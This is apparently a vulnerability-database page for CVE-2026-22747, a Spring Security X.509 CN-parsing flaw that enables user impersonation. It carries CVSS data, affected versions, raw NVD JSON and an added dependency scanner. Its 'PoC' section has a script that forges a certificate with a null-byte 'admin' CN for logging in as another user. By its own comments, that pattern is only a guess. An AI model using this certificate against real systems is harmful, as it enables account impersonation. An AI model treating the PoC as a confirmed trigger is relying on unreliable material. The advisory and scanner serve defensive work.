Security Vulnerability Report
CVE-2026-22747 CVSS 6.8 MEDIUM

CVE-2026-22747

Published: 2026-04-22 06:16:04
Last Modified: 2026-04-24 14:18:56

Description

Vulnerability in Spring Security. SubjectX500PrincipalExtractor does not correctly handle certain malformed X.509 certificate CN values, which can lead to reading the wrong value for the username. With a carefully crafted certificate, this can allow an attacker to impersonate another user. This issue affects Spring Security from 7.0.0 through 7.0.4.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
Note: the 6.8 MEDIUM score above is the Secondary (vendor-sourced) metric. The NVD Primary metric in the raw record below is 8.1 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N, i.e. the same impact but attack complexity rated LOW rather than HIGH. Weakness: CWE-297.

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 7.0.0, versionEndExcluding 7.0.5)
Spring Security 7.0.0
Spring Security 7.0.1
Spring Security 7.0.2
Spring Security 7.0.3
Spring Security 7.0.4
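Added example, not part of this CVE record or of the Spring project: a small Python scanner that reads a Maven pom.xml and flags org.springframework.security artifacts whose declared version falls in the affected range listed above (7.0.0 inclusive to 7.0.5 exclusive, as in the NVD CPE match). The pom.xml content is constructed for the example; the groupId and artifactIds are Spring Security's real Maven coordinates, while the property resolution and version parsing are deliberately simplified assumptions.

```python
"""
Added example (not from the CVE record or the Spring project): flag Maven
dependencies on Spring Security whose version falls in the range NVD lists
for CVE-2026-22747 (versionStartIncluding 7.0.0, versionEndExcluding 7.0.5).
"""
import re
import xml.etree.ElementTree as ET

AFFECTED_START = (7, 0, 0)   # versionStartIncluding from the NVD record
AFFECTED_END = (7, 0, 5)     # versionEndExcluding from the NVD record
SPRING_SECURITY_GROUP = "org.springframework.security"   # real Maven groupId
POM_NS = "{http://maven.apache.org/POM/4.0.0}"           # default POM namespace

# Constructed pom.xml for the example: one property-driven affected version,
# one version outside the range, and one version inherited from a parent/BOM.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <spring-security.version>7.0.3</spring-security.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.springframework.security</groupId>
      <artifactId>spring-security-web</artifactId>
      <version>${spring-security.version}</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.security</groupId>
      <artifactId>spring-security-core</artifactId>
      <version>7.0.5</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.security</groupId>
      <artifactId>spring-security-config</artifactId>
    </dependency>
  </dependencies>
</project>
"""


def parse_version(version: str):
    """Turn '7.0.4' or '7.0.4-SNAPSHOT' into a comparable (major, minor, patch)
    tuple. Qualifiers are dropped (simplification); None if no numeric prefix."""
    m = re.match(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?", version.strip())
    if not m:
        return None
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def is_affected(version: str) -> bool:
    """True when AFFECTED_START <= version < AFFECTED_END."""
    v = parse_version(version)
    return v is not None and AFFECTED_START <= v < AFFECTED_END


def resolve_property(value: str, properties: dict) -> str:
    """Resolve a single ${property} reference from the <properties> block
    (assumption: one level of indirection, no built-in Maven expressions)."""
    m = re.fullmatch(r"\$\{([^}]+)\}", value.strip())
    if m and m.group(1) in properties:
        return properties[m.group(1)]
    return value


def scan_pom(pom_xml: str):
    """Return one finding per Spring Security dependency: artifact, resolved
    version (None if inherited) and a status of affected / not affected / unresolved."""
    root = ET.fromstring(pom_xml)
    properties = {p.tag.replace(POM_NS, ""): (p.text or "").strip()
                  for p in root.findall(f"{POM_NS}properties/*")}
    findings = []
    for dep in root.iter(f"{POM_NS}dependency"):
        group = dep.findtext(f"{POM_NS}groupId") or ""
        artifact = dep.findtext(f"{POM_NS}artifactId") or ""
        version = dep.findtext(f"{POM_NS}version")
        if group != SPRING_SECURITY_GROUP:
            continue
        if version is None:
            # Version managed by a parent POM or BOM: the pom text alone cannot decide.
            status = "unresolved"
        else:
            version = resolve_property(version, properties)
            status = "affected" if is_affected(version) else "not affected"
        findings.append({"artifact": artifact, "version": version, "status": status})
    return findings


if __name__ == "__main__":
    for f in scan_pom(SAMPLE_POM):
        print(f"{f['artifact']:<25} {str(f['version']):<10} {f['status']}")
```

Dependencies that inherit their version from spring-boot-starter-parent or a BOM come back as "unresolved"; for those, check the resolved dependency tree (`mvn dependency:tree`) rather than the pom text, since the managed version is what actually ships.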

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC Concept for CVE-2026-22747
Demonstrates creating a malicious X.509 certificate with a malformed CN.
Note: This requires the target to be running a vulnerable version of Spring Security.
"""
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime

# Generate private key
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
)

# Define subject with a potentially malformed CN to trigger parsing issues
# The exact malformed pattern depends on the specific parsing bug in SubjectX500PrincipalExtractor
# Often involves special characters or encoding sequences that confuse the DN parser.
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"My Company"),
    # Attempting to inject a pattern that might be misinterpreted as a different user
    # For example, embedding a valid username followed by garbage that the parser ignores incorrectly
    x509.NameAttribute(NameOID.COMMON_NAME, u"admin\x00garbage_data"),
])

# Validity window: timezone-aware UTC timestamps (utcnow() is deprecated in recent Python)
now = datetime.datetime.now(datetime.timezone.utc)

cert = x509.CertificateBuilder().subject_name(
    subject
).issuer_name(
    issuer
).public_key(
    private_key.public_key()
).serial_number(
    x509.random_serial_number()
).not_valid_before(
    now
).not_valid_after(
    now + datetime.timedelta(days=365)
).add_extension(
    x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),
    critical=False,
).sign(private_key, hashes.SHA256())

# Write certificate and key to file
with open("malicious_cert.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))
with open("malicious_key.pem", "wb") as f:
    f.write(private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    ))

print("Malicious certificate generated: malicious_cert.pem")
print("Use this certificate to authenticate against the vulnerable Spring Security application.")

References

https://spring.io/security/cve-2026-22747 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22747", "sourceIdentifier": "[email protected]", "published": "2026-04-22T06:16:03.933", "lastModified": "2026-04-24T14:18:56.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Spring Spring Security. SubjectX500PrincipalExtractor does not correctly handle certain malformed X.509 certificate CN values, which can lead to reading the wrong value for the username. In a carefully crafted certificate, this can lead to an attacker impersonating another user.\nThis issue affects Spring Security: from 7.0.0 through 7.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-297"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_security:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.5", "matchCriteriaId": "0B8A5767-EB43-4E11-8E93-9324B70F7060"}]}]}], 
"references": [{"url": "https://spring.io/security/cve-2026-22747", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}